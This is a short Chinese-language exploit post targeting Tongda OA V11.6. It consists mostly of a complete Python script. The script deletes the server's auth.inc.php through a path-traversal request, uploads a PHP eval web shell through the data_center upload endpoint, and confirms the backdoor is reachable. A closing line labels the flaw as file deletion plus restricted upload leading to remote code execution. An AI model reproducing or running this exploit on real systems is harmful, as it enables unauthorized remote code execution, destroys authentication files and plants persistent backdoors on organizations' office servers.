http://www.kxdw.com/soft/23114.html
    漏洞影响版本:通达 OA V11.6
    复现文章地址:https://blog.csdn.net/God_XiangYu/article/details/108091470
    复现前记得备份:webroot\inc 下将auth.inc.php备份一下

    1. import requests
    3. target="http://192.168.159.137:8080/"
    4. payload="<?php eval($_POST['agan']);?>"
    5. print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
    6. input("Press enter to continue")
    7. print("[*]Deleting auth.inc.php....")
    9. url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
    10. requests.get(url=url)
    11. print("[*]Checking if file deleted...")
    12. url=target+"/inc/auth.inc.php"
    13. page=requests.get(url=url).text
    14. if 'No input file specified.' not in page:
    15.     print("[-]Failed to deleted auth.inc.php")
    16.     exit(-1)
    17. print("[+]Successfully deleted auth.inc.php!")
    18. print("[*]Uploading payload...")
    19. url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
    20. files = {'FILE1': ('agan.php', payload)}
    21. requests.post(url=url,files=files)
    22. url=target+"/_agan.php"
    23. page=requests.get(url=url).text
    24. if 'No input file specified.' not in page:
    25.     print("[+]Filed Uploaded Successfully")
    26.     print("[+]URL:",url)
    27. else:
    28.     print("[-]Failed to upload file")

    应该属于任意文件删除+有限制的文件上传,导致RCE